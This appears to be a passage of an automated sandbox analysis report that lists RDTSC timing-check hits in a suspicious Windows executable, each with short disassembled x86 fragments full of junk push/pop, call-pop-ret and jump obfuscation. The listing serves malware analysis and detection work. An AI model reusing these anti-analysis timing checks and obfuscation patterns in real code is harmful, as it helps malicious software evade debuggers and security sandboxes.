Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6AB306 second address: 6AB34E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCD7C4F0DA7h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jmp 00007FCD7C4F0DA4h 0x00000012 push 00000000h 0x00000014 mov cx, 6E00h 0x00000018 push A65E4DAEh 0x0000001d jo 00007FCD7C4F0DA4h 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6AB34E second address: 6AB352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6AB352 second address: 6AB3BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 add dword ptr [esp], 59A1B2D2h 0x0000000d and ecx, dword ptr [ebp+122D3458h] 0x00000013 push 00000003h 0x00000015 xor edx, dword ptr [ebp+122D36B8h] 0x0000001b push 00000000h 0x0000001d or ecx, 4AE23A80h 0x00000023 push 00000003h 0x00000025 mov esi, dword ptr [ebp+122D30D2h] 0x0000002b jg 00007FCD7C4F0D98h 0x00000031 push 4982EE6Bh 0x00000036 jmp 00007FCD7C4F0DA1h 0x0000003b add dword ptr [esp], 767D1195h 0x00000042 mov esi, edx 0x00000044 lea ebx, dword ptr [ebp+1244701Dh] 0x0000004a sub dword ptr [ebp+122D336Dh], edx 0x00000050 push eax 0x00000051 jp 00007FCD7C4F0DA4h 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a popad 0x0000005b rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6AB3BB second address: 6AB3BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6AB44E second address: 6AB46F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jo 00007FCD7C4F0D96h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov si, dx 0x00000010 push 00000000h 0x00000012 add esi, 0D67A5F1h 0x00000018 push DD08C90Ch 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6AB46F second address: 6AB51D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 add dword ptr [esp], 22F73774h 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007FCD7D2AFB08h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 jnc 00007FCD7D2AFB08h 0x0000002f and edx, 2396D460h 0x00000035 push 00000003h 0x00000037 or dword ptr [ebp+12445959h], edx 0x0000003d push 00000000h 0x0000003f mov ch, bh 0x00000041 push 00000003h 0x00000043 push ABFA2BDCh 0x00000048 jng 00007FCD7D2AFB18h 0x0000004e jmp 00007FCD7D2AFB12h 0x00000053 xor dword ptr [esp], 6BFA2BDCh 0x0000005a jmp 00007FCD7D2AFB15h 0x0000005f lea ebx, dword ptr [ebp+12447028h] 0x00000065 jng 00007FCD7D2AFB06h 0x0000006b push eax 0x0000006c mov edx, ebx 0x0000006e pop edx 0x0000006f xchg eax, ebx 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007FCD7D2AFB15h 0x00000077 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6CC7FA second address: 6CC81D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FCD7C4F0D96h 0x0000000a popad 0x0000000b push esi 0x0000000c jmp 00007FCD7C4F0DA5h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6CC81D second address: 6CC822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6CC822 second address: 6CC839 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FCD7C4F0D9Dh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6CC839 second address: 6CC83F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6CC83F second address: 6CC843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6CA980 second address: 6CA984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6CAEA6 second address: 6CAEBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCD7C4F0D9Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007FCD7C4F0D96h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6CAEBD second address: 6CAEC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6CB01F second address: 6CB027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6CB027 second address: 6CB034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FCD7D2AFB12h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6CB034 second address: 6CB042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FCD7C4F0D96h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6CB042 second address: 6CB046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6CB046 second address: 6CB064 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCD7C4F0DA1h 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6CB064 second address: 6CB06D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6CB06D second address: 6CB071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6CB071 second address: 6CB08A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCD7D2AFB06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007FCD7D2AFB08h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6CB1E1 second address: 6CB1FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0D9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007FCD7C4F0D96h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6CB50C second address: 6CB518 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6CB668 second address: 6CB66C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6CB66C second address: 6CB670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6C0749 second address: 6C0755 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FCD7C4F0D96h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6C0755 second address: 6C0772 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB19h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CC18C second address: 6CC195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CC195 second address: 6CC19B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CC19B second address: 6CC19F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CC19F second address: 6CC1CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FCD7D2AFB0Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FCD7D2AFB11h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CC1CC second address: 6CC1DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0D9Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CC1DA second address: 6CC1E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CC1E0 second address: 6CC1E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CC389 second address: 6CC3BC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCD7D2AFB06h 0x00000008 jl 00007FCD7D2AFB06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FCD7D2AFB17h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6CC3BC second address: 6CC3D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FCD7C4F0D9Ch 0x0000000e jnc 00007FCD7C4F0D96h 0x00000014 push ecx 0x00000015 je 00007FCD7C4F0D96h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D2602 second address: 6D2617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCD7D2AFB0Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 699E63 second address: 699E6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D6C04 second address: 6D6C0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D6C0C second address: 6D6C12 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D63E3 second address: 6D6405 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB18h 0x00000007 ja 00007FCD7D2AFB12h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D89B0 second address: 6D89CD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e jns 00007FCD7C4F0DA4h 0x00000014 pushad 0x00000015 jp 00007FCD7C4F0D96h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D8A8C second address: 6D8ABF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e jmp 00007FCD7D2AFB11h 0x00000013 pop eax 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D8ABF second address: 6D8AC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D8AC5 second address: 6D8AE1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCD7D2AFB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 js 00007FCD7D2AFB06h 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D8E68 second address: 6D8E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D8E6F second address: 6D8E83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007FCD7D2AFB06h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D8E83 second address: 6D8E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D8E87 second address: 6D8E8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D9087 second address: 6D908D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D908D second address: 6D9096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D91BD second address: 6D91C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D925C second address: 6D9275 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007FCD7D2AFB06h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007FCD7D2AFB08h 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D9275 second address: 6D927A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D9C2F second address: 6D9C35 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D9C35 second address: 6D9C3A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D9C3A second address: 6D9C52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FCD7D2AFB0Eh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D9CCE second address: 6D9CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 push eax 0x00000007 pushad 0x00000008 jnc 00007FCD7C4F0D9Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6D9CDE second address: 6D9CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DAC76 second address: 6DAD19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0DA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jne 00007FCD7C4F0D9Ch 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007FCD7C4F0D98h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007FCD7C4F0D98h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 00000016h 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 push 00000000h 0x00000049 push 00000000h 0x0000004b push ecx 0x0000004c call 00007FCD7C4F0D98h 0x00000051 pop ecx 0x00000052 mov dword ptr [esp+04h], ecx 0x00000056 add dword ptr [esp+04h], 0000001Ah 0x0000005e inc ecx 0x0000005f push ecx 0x00000060 ret 0x00000061 pop ecx 0x00000062 ret 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007FCD7C4F0DA0h 0x0000006b rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DBE99 second address: 6DBE9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DB53E second address: 6DB552 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0DA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DBE9D second address: 6DBEA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DB552 second address: 6DB56B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0D9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DBEA3 second address: 6DBF10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FCD7D2AFB08h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 mov edi, ecx 0x00000026 or edi, dword ptr [ebp+1247323Ah] 0x0000002c push 00000000h 0x0000002e mov esi, dword ptr [ebp+122D3227h] 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push esi 0x00000039 call 00007FCD7D2AFB08h 0x0000003e pop esi 0x0000003f mov dword ptr [esp+04h], esi 0x00000043 add dword ptr [esp+04h], 0000001Ah 0x0000004b inc esi 0x0000004c push esi 0x0000004d ret 0x0000004e pop esi 0x0000004f ret 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jng 00007FCD7D2AFB08h 0x00000059 pushad 0x0000005a popad 0x0000005b rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DB56B second address: 6DB570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DB570 second address: 6DB588 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCD7D2AFB14h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DDD2A second address: 6DDDAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007FCD7C4F0DA0h 0x0000000c pop edi 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 jmp 00007FCD7C4F0D9Ch 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007FCD7C4F0D98h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 mov dword ptr [ebp+122D281Fh], ecx 0x00000038 push 00000000h 0x0000003a mov edi, 514D4255h 0x0000003f xchg eax, ebx 0x00000040 js 00007FCD7C4F0D9Eh 0x00000046 push eax 0x00000047 je 00007FCD7C4F0D96h 0x0000004d pop eax 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 js 00007FCD7C4F0DADh 0x00000057 jmp 00007FCD7C4F0DA7h 0x0000005c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DDDAC second address: 6DDDB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DF8E5 second address: 6DF8EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DF8EB second address: 6DF8FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FCD7D2AFB06h 0x0000000a popad 0x0000000b push esi 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DF8FB second address: 6DF915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FCD7C4F0D9Ch 0x0000000d popad 0x0000000e push eax 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DF915 second address: 6DF93C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 jc 00007FCD7D2AFB37h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCD7D2AFB19h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DFF71 second address: 6DFF75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DFF75 second address: 6DFF7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
